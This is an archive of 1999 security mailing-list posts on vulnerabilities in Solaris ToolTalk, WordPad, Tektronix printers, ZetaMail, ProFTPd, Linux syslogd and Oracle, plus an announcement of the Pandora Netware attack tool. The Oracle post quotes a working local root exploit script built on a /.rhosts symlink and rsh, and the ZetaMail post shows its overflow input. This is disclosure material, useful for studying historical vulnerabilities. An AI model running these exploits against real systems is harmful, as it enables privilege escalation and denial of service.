Re: rpc.ttdbserverd on solaris 7 In-reply-to: Your message of Tue, 16 Nov 1999 14:34:41 PST.

1999-01-17 Thread Elias Levy

After talking to Casper and Dan Stronberg it seem the issue he
is seeing is Sun BugID 4204015 "dbserver SEGVs when rpc function 15 is
called with garbage". This vulnerability in Solaris 7 seem to be
triggered by the old rpc.ttdbserverd exploit. Please note that
an attacker can't make rpc.ttdbserverd execute code. It can simply
make it crash (dereferencing a NULL pointer). The problem is fixed
by Patch-ID# 107893-02. So no, Solaris 7 is not vulnerable to the
old rpc.ttdbserverd exploit in as much as it will only crash the
service, not execute code in the target system.

Also note that although the patch is not in the recommended patch list,
it is in the security path list which in effect makes it public.
Elias Levy
Security Focus

Re: rpc.ttdbserverd on solaris 7

1999-01-17 Thread Brent Paulson

] We recently had mass attempts at breaking into our systems through
] rpc.ttdbserverd.

] Some of the rpc.ttdbserverd's dumped core, including at least one on
] solaris 7.
] Some of our systems with noexec_user_stack and noexec_user_stack_log
] reported attempts to execute code on the stack.  Needless to say, this
] is worrisome.

] The messages logged look like:

] Nov 12 18:47:01 /usr/dt/bin/rpc.ttdbserverd[646]:
] _Tt_file_system::findBestMountPoint -- max_match_entry is null,
] aborting...
] Nov 12 18:47:01 inetd[143]: /usr/dt/bin/rpc.ttdbserverd:
] Segmentation Fault - core dumped
] Nov 12 18:47:02 unix: rpc.ttdbserverd[1932] attempt to
] execute code on stack by uid 0
] Nov 12 18:47:02 inetd[143]: /usr/dt/bin/rpc.ttdbserverd:
] Segmentation Fault - core dumped
] Nov 12 18:47:03 unix: rpc.ttdbserverd[1934] attempt to
] execute code on stack by uid 0
] Nov 12 18:47:03 inetd[143]: /usr/dt/bin/rpc.ttdbserverd:
] Segmentation Fault - core dumped

] We looked at the situation a bit more, and discovered that there is an
] rpc.ttdbserverd patch for Solaris 7 (107893-02), but it actually isn't
] on the recommended patch list for some reason.

] Does this patch fix the vulnerability I've described?

Yes, the Solaris 7 patch 107893-02 does fix the core dump problem.  The
core dump is not caused by a stack overflow, but by a NULL pointer
dereference.  We do always recommend that users install the latest
recommended and security patch sets for your version of Solaris.

] If yes, why would it not be recommended?

It is on the current recommended patch list, I confirmed this at:


Patch-ID# 107893-02
Synopsis: OpenWindows 3.6.1: Tooltalk patch
BugId's fixed with this patch: 4229531 4153078 4204015 4260867
Changes incorporated in this version: 4204015 4260867
Date: Sep/27/99

] If not, is a patch forthcoming?

See above.

Best regards,
Brent Paulson

Re: WordPad/riched20.dll buffer overflow

1999-01-17 Thread Gerardo Richarte

Pauli Ojanpera wrote:

 Just if someone needs to know...

 Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
 overflow problem with ".rtf"-files.

 Crashme.rtf :

 A malicious document may probably abuse this to execute arbitary
 code. WordPad crashes with EIP=41414141.

 Someone else do deeper investigation since I don't care to.

I've been trying to determine if it's exploitable, and couldn't
reproduce what you described. I want to know if there is some other
information I need to know... here is what I tried:

an rtf file with

{\rtf\A...} a lot of As (tryed 32,49,1000,2000,...

nothing happened until 5000, where I got a crash but not with
0x41414141 but with ESI==0x41414141 on a 'push [esi]'. ESI was copyed
previously from the stack, but on the stack there where only 4 As here,
8 As there, a so...
then on 1 As I got a different crash, with EDI==0x41414141,
never got EIP==0x41414141.

Anyway, it MAY be exploitable, but doesn't look simple...

Then I tryed a differen aproach I got, I used a real rtf file and appended
the same amount (32,49,...) of As after the first '\', but got exactly
the same results...

could anybody reproduce this bug?


A390 1BBA 2C58 D679 5A71 - 86F9 404F 4B53 3944 C2D0
Research and Developemen - CoreLabs - Core SDI (Information Security)

--- For a personal reply use [EMAIL PROTECTED]

Re: Tektronix PhaserLink Webserver Reveals Admin Password

1999-01-17 Thread elfchief

 Here are a couple more problems with the Tektronix webserver services:

And one more: Even in absence of any sort of password- (or password hash-)
aquiring attack, it's still possible to use up all of someone's consumables
without a password at all -- No trickery required!

[Keep in mind that a toner set for a 780 is ~ $600]

The "configure settings" page (http://printer/button_config.html) has
a drop-down menu that allows you to print a number of different
pages (test pages, color samples, startup page). This menu, and the
functions it performs, do not require a password of any sort. Go to the
page, select "CMYK Sampler Prints", click the button, and sit back while
32 pages of toner and paper go away.

[I reported this to Tektronix more than 6 months ago, at the same time I
 reported a printer-crashing bug. They fell all over themselves to fix
 the crashing bug (with some of the best support I'd ever gotten ... good
 job!), but seemed truly uninterested in stopping random people from being
 able to consume one's toner.]

Me, I just firewall my damned printer.


Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability

1999-01-17 Thread Ussr Labs

Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability


UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail POP3/SMTP
the buffer overflow is caused by a long user name/password, 3500 characters.

There is not much to expand on just a simple hole

[gimmemore@itsme]$ telnet 110
Connected to
Escape character is '^]'.
+OK ZetaMail for 95 BD0211 4294764405.063903189415041@itsme
USER {buffer)
+OK Send password
PASS  {buffer)

Overflow Crashh.

Where (buffer) is 3500 characters.

Binary / Source for the D.o.s for Windows / Linux:

Vendor Status:


 install another program from the same vendor,
 MsgCore/95 2.11,MsgCore/NT 2.10

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h

ProFTPd - mod_sqlpw.c

1999-01-17 Thread Todd C. Campbell

A member of the proftpd mailing list and myself discovered a problem
with proftpd with mod_sqlpw.c optional module compiled in.

Unix last command reveals passwords where the username should be.
A patch was sent to the mailing list, however, the patch only protects
ftp localhost not ftp remotehost.

Johnie Ingram (Author of mod_sqlpw.c) was notified, as well as, the rest
of the mailing list.

I suggest the following work around:

Wtemplog off

Wtmplog details below:

Syntax: WtmpLog on|off|NONE
Default: WtmpLog on
Context: server config, VirtualHost, Anonymous, Global
Compatibility: 1.1.7 and later

The WtmpLog directive controls proftpd's logging of ftp connections to
the host system's wtmp file (used by such commands
as `last'). By default, all connections are logged via wtmp.


local users can panic linux kernel (was: SuSE syslogd advisory)

1999-01-17 Thread Mixter

The impact of the syslogd Denial Of Service vulnerability seems to
be bigger than expected. I found that syslog could not be stopped from
responding by one or a few connections, since it uses select() calls
to synchronously manage the connections to /dev/log. I made an attempt
with the attached test code, which makes about 2000 connects to syslog,
using multiple processes, and my system instantly died with the message:
'Kernel panic: can't push onto full stack'

I've been able to reproduce this as non-root user, although it had to
be done two times to overcome the stronger user resource limits, but
it worked. This has been tested with linux 2.0.38+syslog1.3 (redhat 5.2).

As a temporary fix, I'd strongly advise everyone who hasn't to set proper
user resource limits, but that is only a very temporary fix.

Taking a guess, I would say that the panic is caused by instability of
the linux select() implementation, and could therefore be abused in other
programs that manage an unlimited amount of connections using the select



On Thu, 18 Nov 1999, Thomas Biege wrote:


 SuSE Security Announcement - syslogd (a1)

 Package:  syslogd-1.3.33 (a1)
 Date: Thu Nov 18 14:00:29 CET 1999

 Affected SuSE versions: 6.2 and 6.3
 Vulnerability Type: local denial-of-service attack
 SuSE default package:   yes
 Other affected systems: all Linux systems using the syslog daemon

 A security hole was discovered in the package mentioned above.
 Please update as soon as possible or disable the service if you are using
 this software on your SuSE Linux installation(s).

 Other Linux distributions or operating systems might be affected as
 well, please contact your vendor for information about this issue.

 Please note, that that we provide this information on an "as-is" basis only.
 There is no warranty whatsoever and no liability for any direct, indirect or
 incidental damage arising from this information or the installation of
 the update package.

 1. Problem Description

   The syslogd server uses a Unix Domain stream socket (/dev/log) for receiving
   local log messages via syslog(3).
   Unix Domain stream sockets are non connection-less, that means, that
   one process is needed to serve one client.

 2. Impact

   By opening alot of local syslog connections a user could stop the
   system from responding.

 3. Solution

   Updated the package from our FTP server.

 Please verify these md5 checksums of the updates before installing:

   c9a9e0f8fc4e29daf30f8a735ae333ab  syslogd-1.3.33-9.alpha.rpm  (AXP, 6.1)
   3104e26a8b474e215ed703b7c4d4  syslogd-1.3.33-9.i386.rpm   (x86, 5.3)
   a13be12a75232f2f62f51fb1cae26fc0  syslogd-1.3.33-9.i386.rpm   (x86, 6.1)
   fc29df9455288f40eb1e8dbd0f47d5b3  syslogd-1.3.33-9.i386.rpm   (x86, 6.2)
   869b7fedd5b52807f12b7f66e282002c  syslogd-1.3.33-9.i386.rpm   (x86, 6.3)

 You can find updates on our ftp-Server:

 or try the following web pages for a list of mirrors:

 Our webpage for patches:

 Our webpage for security announcements:

 If you want to report vulnerabilities, please contact

 SuSE has got two free security mailing list services to which any
 interested party may subscribe:

 [EMAIL PROTECTED]  - moderated and for general/linux/SuSE
   security discussions. All SuSE security
   announcements are send to this list.

 [EMAIL PROTECTED] - SuSE's announce-only mailing list.
   Only SuSE's security annoucements are sent
   to this list.

 To subscribe to the list, send a message to:

 To remove your address from the list, send a message to:

Notifying Vendors

1999-01-17 Thread Kerb

With the bit of talk of notifying vendors in the past day or two,
I thought I might throw in my $0.02 and how I do things.

Notification and how long you wait for response should be
dependant on usage of the software.  For example, the WU-FTPD
hole in 2.5.0.  No exploit has been released to date, even though
2.6.0 is out.  Its a widespread package that would affect a LOT
of systems if the exploit was just tossed out without giving
the vendors time to come up with at least a temporary fix
better than "disable FTP".  I believe that notification is _almost_
always necessary (except in rare cases like my Alibaba CGI
bugs, because Alibaba had already demonstrated their lack of
interest in security of their software).  So basically what I'm
trying to say is the time you wait for a response from the
vendor (and/or a patch released) should depend on the
severity of the hole and how widespread it will be.


Re: WordPad/riched20.dll buffer overflow

1999-01-17 Thread User SCOTT

This bug is also present in Microsoft's flagship operating system Windows

On Thu, 18 Nov 1999, Pauli Ojanpera wrote:

 Just if someone needs to know...

 Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
 overflow problem with ".rtf"-files.

 Crashme.rtf :

 A malicious document may probably abuse this to execute arbitary
 code. WordPad crashes with EIP=41414141.

 Someone else do deeper investigation since I don't care to.

 Get Your Private, Free Email at

Potential vulnerability in Oracle

1999-01-17 Thread Mary Ann Davidson

Hi Brock

Your note concerning a possible security vulnerability in Oracle (text
below) was forwarded to me. This vulnerability has indeed been diagnosed
and fixed already. Here is the scoop on where you can obtain fixes:

The alert and 5 patches are posted on metalink:
- URL:

The alert and 5 patches are posted on OTN:
- URL:

This was also issued as an ISS alert.

Regarding your comment about reporting these issues to Oracle, we do
have an internal process in place for expediting the way we handle
potential security vulnerabilities, but we believe it's best to have all
potential bugs come through Oracle World Wide Support first, after which
they are diagnosed, and expedited as required.

Thank you for your interest in Oracle and security.

Yours very truly,

Mary Ann Davidson

Mary Ann Davidson
Group Product Manager, Security
Server Technologies
Oracle Corporation
(650) 506 5464
No ka moana ku'u mele; no na halu au e hula ai.
"From the ocean comes my song; of the waves I dance my dance."

 A vulnerability exists in Oracle 8.1.5 for UN*X which may allow any
 to obtain root privileges.

 My testing was done with Oracle 8.1.5 on Solaris 2.6 SPARC edition.
 This shouldn't make any difference, however, and I would consider any
 UNIX Oracle implementation to be exploitable.

When run without ORACLE_HOME being set, dbsnmp (suid root/sgid dba by
 default) will dump two log files out into pwd, dbsnmpc and dbsnmpt .
 these files do not exist, dbsnmpd will attempt to create them mode 666
 and dump around 400 bytes of uncontrolable output into them.  If the
 files do exist, dbsnmp will append these 400 bytes but not change the
 permissions.  Thus if root does not have an .rhosts file, we can obtain

 root privs by creating a symlink from /tmp/dbsnmpc to /.rhosts.  One
 thing to note about the exploit is that on my particular
 a normal user does not have read access above /product/ in the Oracle
 path (something like /u01/app/oracle/product/8.1.5/bin/dbsnmp).  This
 won't prevent you from running the exploit since the execute bit is set

 for world on all of Oracle's directories, but you may have to guess
 about the location of dbsnmp.  This can usually done by examining the
 process list for Oracle entries.

 One small rant about Oracle is their ridiculously complicated bug
 reporting scheme, which asks you 2814 questions and allows you ONE line

 of text to explain your problem.  In this day and age, I don't
 understand why every major software vendor doesn't have something as
 simple as a mailto [EMAIL PROTECTED] SOMEWHERE on their site.  In
 fact, when I searched Oracle's web page, I got zero hits on the word
 "security".  Perhaps this address does exist and a bugtraq reader would

 care to enlighten me.


   oracle8% uname -a; id
   SunOS oracle8 5.6 Generic_105181-05 sun4u sparc
   uid=102(btellier) gid=10(staff)
   oracle8% /tmp/
   couldn't read file "/config/nmiconf.tcl": no such file or directory
   Failed to initialize nl component,error=462
   Failed to initialize nl component,error=462
 --- ---
   # Exploit for Oracle 8.1.5 on Solaris 2.6 and probably others
   # You'll probably have to change your path to dbsnmp
   # Exploit will only work if /.rhosts does NOT exist
   # Brock Tellier [EMAIL PROTECTED]
   cd /tmp
   unset ORACLE_HOME
   ln -s /.rhosts /tmp/dbsnmpc.log
   echo "+ +"  /.rhosts
   rsh -l root localhost 'sh -i'
   rsh -l root localhost rm /tmp/*log*
   rsh -l root localhost rm /.rhosts

Pandora v4 Beta 2 Software

1999-01-17 Thread Simple Nomad


  Nomad Mobile Research Centre
 A N N O U N C E M E N T
Simple Nomad [[EMAIL PROTECTED]]

   Product : Pandora v4.0 Beta 2
  Platform : Windows 95/98/NT
 X on Linux

Jitsu-Disk has been very, very busy.

Pandora v4.0 beta software has been updated. The new Pandora v4.0 *Beta 2*
software is now available. It still has the "point, click, and attack" GUI
interface, it still runs under Windows 95/98/NT or Linux with X, it still is
the full metal jacket ninja kungfu action software for hacking Netware you've
grown to love. Still compiled with 100% freeware compilers using freeware
libraries with no big corporation SDK assistance, still the same GUI in Windows
or Linux.

The GUI interface contains these features:

   * Offline and Online components. Offline for cracking passwords offline,
 and Online for direct server attacks.
   * Improved MGUI interface.

   Offline includes:
   * Password cracking of Netware 4.x and 5.x passwords.
   * Reads native NDS files -- as well as maintenance files such as
 BACKUP.DS, BACKUP.NDS, and DSREPAIR.DIB -- and extracts password hashes
 for cracking.
   * Reads Netware 4.x and 5.x versions of NDS, BACKUP.DS, and
   * Multiple accounts can be brute forced and dictionary cracked
   * Preset and user-definable keyspace for brute forcing.
   * On screen sorting of account listings for easy viewing.
   * Built-in NDS browser to look at all NDS objects.
   * Remote Console Decryption using The Ruiner's decryption algorithm.
   * Fully optimized for Pentium processors for maximum carnage.
   * Bug fixes from Beta 1.

   Online includes:
   * Attach to servers using only the password hash (if you do not wish to
 crack them).
   * Dictionary attacks against NDS objects that detect if Intruder
 Detection was triggered.
   * Browse for target servers and gather connection info for spoofing
   * GameOver spoofing attack against servers not using Level 3 packet
   * Improved Level3-1 attack which no longer requires using a sniffer to
 find elusive data for Admin session hijacking, just add in the Admin's
 MAC address and we do the rest.
   * "Sniff-n-Grab" files being downloaded from the Netware server by
 unsuspecting users.
   * Several nasty Denial of Service attacks.
   * Improved packet drivers from Beta 1.
   * Numerous bug fixes.
   * Actual working code to attack from Linux. Requires an IPX-aware
 kernel and root access.

Full source code included in case you don't trust our binaries, and for adding
your own code.

Windows software is available now and appears to be stable. Linux software is
posted and works, but may be updated somewhat frequently over the next few
days. The Online code for Linux is working but YMMV.

Check out binaries, code, doco, rants, and more at


Re: WordPad/riched20.dll buffer overflow

1999-01-17 Thread Bronek Kozicki

 Just if someone needs to know...

 Win98/NT4 Riched20.dll (which WordPad uses) has a classic buffer
 overflow problem with ".rtf"-files.

 Crashme.rtf :

 A malicious document may probably abuse this to execute arbitary
 code. WordPad crashes with EIP=41414141.

I got my WordPad crashed with message:

The instruction at "0x61616161" referenced memory at "0x61616161". The
memory could not be "read".

I press "OK" to close application, next message is:

The instruction at "0x5f8012b3" referenced memory at "0x0004". The
memory could not be "read".

Then I have only "choice" to "terminate the application".

I use Windows NT (international English edtion) + SP5 .

Bronek Kozicki